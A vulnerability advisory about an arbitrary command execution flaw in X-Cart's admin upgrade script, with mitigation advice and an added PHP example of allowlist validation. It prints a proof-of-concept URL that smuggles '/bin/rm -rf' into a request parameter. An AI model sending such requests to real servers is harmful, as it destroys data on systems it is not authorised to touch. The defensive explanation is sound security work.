Vendor: X-Cart
By: Unknown
CVSS: 9 (CRITICAL)
Arbitrary Command Execution
CWE: 78
Product Name: X-Cart
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:qualiteam:x-cart
Metasploit:
Other Scripts:
Platforms Tested: Unknown

X-Cart Arbitrary Command Execution

X-Cart is prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI.

Mitigation:

It is recommended to sanitize user inputs and validate parameters in the URI to prevent command execution vulnerabilities. Additionally, restricting access to sensitive functionality and regularly updating the application can also help mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9560/info

X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI.

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..
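The mitigation above, as an added example written for this page (not X-Cart's own upgrade.php code): a hypothetical PHP handler that takes the three request fields the proof-of-concept request names and refuses any value outside an allowlist before it can reach a shell. The interpreter paths in ALLOWED_PERL and the PATCH_DIR location are assumed values.

```php
<?php
// Added example, not X-Cart code: a hardened handler for the request fields
// named in the advisory (perl_binary, patch_exe, patch_files[0][orig_file]).
// Assumed values: the allowed interpreters and the patch script directory.
const ALLOWED_PERL = ['/usr/bin/perl', '/usr/local/bin/perl'];
const PATCH_DIR    = '/var/www/xcart/patches';
// Returns the command line to run, or null if any field fails validation.
// Validation comes first; a rejected request never produces a command.
function build_patch_command(array $req): ?string
{
    // The interpreter must equal an allowlisted path exactly, so a value
    // such as "/bin/rm -rf " (not on the list, contains a space) is refused.
    $perl = (string) ($req['perl_binary'] ?? '');
    if (!in_array($perl, ALLOWED_PERL, true)) {
        return null;
    }

    // The patch script is a bare file name inside PATCH_DIR: basename()
    // drops directory parts, and "." / ".." are refused explicitly.
    $patch = basename((string) ($req['patch_exe'] ?? ''));
    if ($patch === '' || $patch === '.' || $patch === '..'
        || !preg_match('/^[A-Za-z0-9._-]+$/', $patch)) {
        return null;
    }

    // The original file is a relative path limited to a safe character
    // set, with no ".." segments and no leading slash.
    $orig = (string) ($req['patch_files'][0]['orig_file'] ?? '');
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._\/-]*$/', $orig)
        || strpos($orig, '..') !== false) {
        return null;
    }

    // Arguments are still quoted for the shell as defence in depth.
    return escapeshellarg($perl) . ' '
         . escapeshellarg(PATCH_DIR . '/' . $patch) . ' '
         . escapeshellarg($orig);
}
// Constructed requests: the first mirrors the advisory's proof-of-concept
// parameters and is rejected; the second is a well-formed upgrade request.
$rejected = build_patch_command([
    'perl_binary' => '/bin/rm -rf ', 'patch_exe' => '..',
    'patch_files' => [['orig_file' => 'VERSION']],
]);
$accepted = build_patch_command([
    'perl_binary' => '/usr/bin/perl', 'patch_exe' => 'apply.pl',
    'patch_files' => [['orig_file' => 'VERSION']],
]);
var_dump($rejected === null, $accepted);
```

The allowlist check is the actual control; escapeshellarg() is kept only so that a future change to the validation rules does not silently reopen the shell.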